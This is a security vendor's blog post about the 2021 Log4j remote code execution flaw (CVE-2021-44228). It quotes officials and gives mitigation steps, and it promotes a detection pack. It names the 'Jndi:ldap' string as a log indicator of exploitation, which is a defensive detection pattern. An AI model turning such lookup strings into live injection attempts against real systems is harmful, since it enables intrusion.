Launch extended detection and response steps to manage Log4j vulnerability

Threat Hunts must include cloud, network, endpoint, log and email vectors Note: OpenText™ Security reports that there is no Log4j impact on its EnCase suite…

OpenText Security Cloud Team profile picture

OpenText Security Cloud Team

December 14, 20213 minutes read

Threat Hunts must include cloud, network, endpoint, log and email vectors

Note: OpenText™ Security reports that there is no Log4j impact on its EnCase suite of products including EnCase Endpoint Investigator, EnCase Endpoint Security, EnCase Forensic, EnCase Information Assurance, EnCase Mobile Investigator, and Tableau Forensic. See the latest OpenText Security Alert here.

Top US cybersecurity officials have warned of the zero-day vulnerability found in the Java logging library Apache Log4j.

ZDNet reports that the vulnerability, being tracked as CVE-2021-44228, is “severe and allows unauthenticated remote code execution as the user running the application utilizes the Java logging library.”

It further writes that CERT New Zealand warns that it’s already being exploited in the wild.

Log4J is a popular Java library for logging error messages in applications. This vulnerability lets any remote attacker take control of another device on the internet if it’s running Log4J versions 2.0 to 2.14.1. 

“This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” Jen Easterly, director of CISA said in a call shared with CNN. Easterly has spent 20 years in various federal cybersecurity roles. “We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” she said. The call, with US critical infrastructure owners and operators, was first reported by CyberScoop.

Turn on breach mentality

Given the severity and urgency of the Log4j vulnerability, OpenText Security advises customers to employ a breach mentality and immediately initiate detection and response measures. Any anomaly should be validated against CVE-2021-44228 and appropriate remediation and recovery measures activated. 

As a first step to understanding the attack surface, customers of EnCase Endpoint Security can use the “Find Hosts with IOCs” capability to hunt for instances of log4j.jar files across the enterprise.

According to researchers at LunaSec, organizations can identify if they’re affected by examining the log files for any services using affected Log4j versions. If they contain user-controlled strings, CERT-NZ uses the example of “Jndi:ldap”, they could be affected.

To mitigate vulnerabilities, users should switch log4j2.formatMsgNoLookups to true by adding:”‐Dlog4j2.formatMsgNoLookups=True” to the JVM command for starting the application. To prevent the library from being exploited, it’s urgently recommended that Log4j versions be upgraded to log4j-2.15.0-rc1.

The Log4j vulnerability detection pack is now available for EnCase Endpoint Security.

This detection pack includes filters that will locate the presence of vulnerable versions of Log4j using hashes, as well as searches that detect active and past exploitations based on Indicators of Compromise (IOCs).

Customers and partners can download the detection pack and documentation from the OpenText My Support website here.

Talk to one of our security experts for more information.

Share this post

Share this post to x. Share to linkedin. Mail to
OpenText Security Cloud Team avatar image

OpenText Security Cloud Team

See all posts

More from the author

Dissecting IcedID behavior on an infected endpoint

Dissecting IcedID behavior on an infected endpoint

IcedID, also known as BokDot, is a banking trojan that was first discovered in 2017. It targets a victim’s financial information and it is also…

March 30, 2023 4 minutes read
Technology meets tenacity

Technology meets tenacity

Technology alone won’t defeat cybercriminals. Effective cybersecurity isn’t something you buy off the shelf, set, and forget. To secure your data, you must be proactive,…

November 3, 2022 4 minutes read
OpenText MxDR platform: a team player

OpenText MxDR platform: a team player

There’s a truism in the cybersecurity sector that says enterprise technology stacks are so large because the market demanded big-stack solutions. Convenience, fiscal constraints, and…

November 1, 2022 3 minutes read

Stay in the loop!

Get our most popular content delivered monthly to your inbox.